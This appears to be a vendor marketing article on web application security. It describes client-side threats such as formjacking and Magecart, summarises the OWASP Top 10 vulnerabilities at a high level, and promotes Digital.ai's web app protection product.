Getting ahead of web app security threats
As web application technology evolves, robust security measures must follow suit. Threats to web app security are a reality and happening across the globe. Standard measures are no longer sufficient to protect against evolving threats. Fortunately, apps do not have to remain vulnerable, waiting to be exploited by bad actors. There are solid security measures and practices that can be employed to protect this ever-growing attack surface.
Web applications have evolved—so must security
New attack vectors are constantly emerging as technology evolves. Now more than ever, comprehensive security tools are needed. Previously, device endpoint protection and network security were the ultimate in protective measures. Then came mobile and cloud technology, greatly minimizing network security efficacy and essentially blowing apart the perimeter-centric protection approach so heavily relied upon.
Fast-forward to today where a whole new approach to accessing back-office systems has evolved, opening up new business opportunities—legitimate and illegitimate ones. Organizations are now increasingly relying on application programming interfaces (APIs) to drive innovation, speed of development, and provide new monetization opportunities. But, according to the Open Web Application Security Project (OWASP) API Security Top 10 2019 report, “By nature, APIs expose application logic and sensitive data such as Personally Identifiable Information (PII) and because of this, APIs have increasingly become a target for attackers.” Moving important components to the client-side of applications (that is, outside the protection of traditional network security) creates a massive new attack surface, increasing the risk of attacks such as formjacking, Document Object Model (DOM) tampering, session abuse, overlay attacks, and API abuse.
Unfortunately, many organizations still believe a web application firewall (WAF) is all that’s needed to protect web apps from security threats. In reality, WAFs provide only a portion of the solution. Traditional security techniques such as WAFs are unable to stop today’s web app attacks that, in many cases, originate at the browser outside the purview of network security. By the time they are triggered—if ever—the bad actor is long-gone with sensitive information and all that can be done is focus efforts on damage control.
As bad actors continue pushing boundaries in identifying new attack vectors, organizations must respond in kind to ensure critical assets and data are being properly and fully protected.
Web application security risks are real and happening now
As seen with recent web-based application breaches at British Airways and Ticketmaster, even if a WAF was in place and properly configured, it would not have been able to prevent these browser/client-side breaches. Once the exploitations were discovered, hundreds of thousands of customer records had already been exfiltrated—too late to take any action.
Common web app vulnerabilities
According to OWASP, the top 10 most common application vulnerabilities include:
- Injection. An injection happens when a bad actor sends invalid data to the web app to make it operate differently from the intended purpose of the application.
- Broken Authentication. A broken authentication vulnerability allows a bad actor to gain control over an account within a system or the entire system.
- Sensitive Data Exposure. Sensitive data exposure means data is vulnerable to being exploited by a bad actor when it should have been protected.
- XML External Entities (XXE). A type of attack against an application that parses XML input and occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.
- Broken Access Control. When components of a web application are accessible instead of being protected like they should be, leaving them vulnerable to data breaches.
- Security Misconfigurations. Incorrectly misconfiguring a web application provides bad actors with an easy way in to exploit sensitive information.
- Cross Site Scripting (XSS). An XSS attack means a bad actor injects malicious client-side scripts into a web application.
- Insecure Deserialization. Bad actors will exploit anything that interacts with a web application—from URLs to serialized objects—to gain access.
- Using Components with Known Vulnerabilities. Instances such as missed software and update change logs can serve as big tip-offs for bad actors looking for ins into a web application. Disregarding updates can allow a known vulnerability to survive within a system.
- Insufficient Logging and Monitoring. Lack of efficient logging and monitoring processes increases the chances of a web app being compromised.
The majority of these vulnerabilities are out of the control of WAFs since WAFs are limited in their ability to stop malicious traffic that appears entirely legitimate.
Magecart is always working to exploit web app vulnerabilities
With bad actors such as Magecart—a loose collection of cyber criminal groups who target web apps to steal customer payment card information—working around-the-clock to exploit web app vulnerabilities, understanding the attack vectors driving these attacks and the steps necessary to stop them and protect web applications is critical.
Practical solutions for protecting web apps
Despite the fact that there are groups like Magecart doing everything possible to create new exploits and attacks to obtain sensitive information, web applications can be protected.
Flexible code protection, threat detection and data exfiltration prevention are all elements of a practical web security solution necessary to protect client-side apps, the web services they connect to, and are included in Digital.ai Application Protection for Web:
- Active Protection to protect against browser data exfiltration with an in-app firewall by allowing the app or API to connect only with legitimate servers, and automatically responding with countermeasures when code analysis or tampering is detected by shutting down web app functionality or the entire browser.
- Real-Time Threat Notification to alert the business if code, page tampering, or analysis is attempted that can initiate an immediate operational response — such as shutting down attacker accounts or updating web code protection to counter an attack.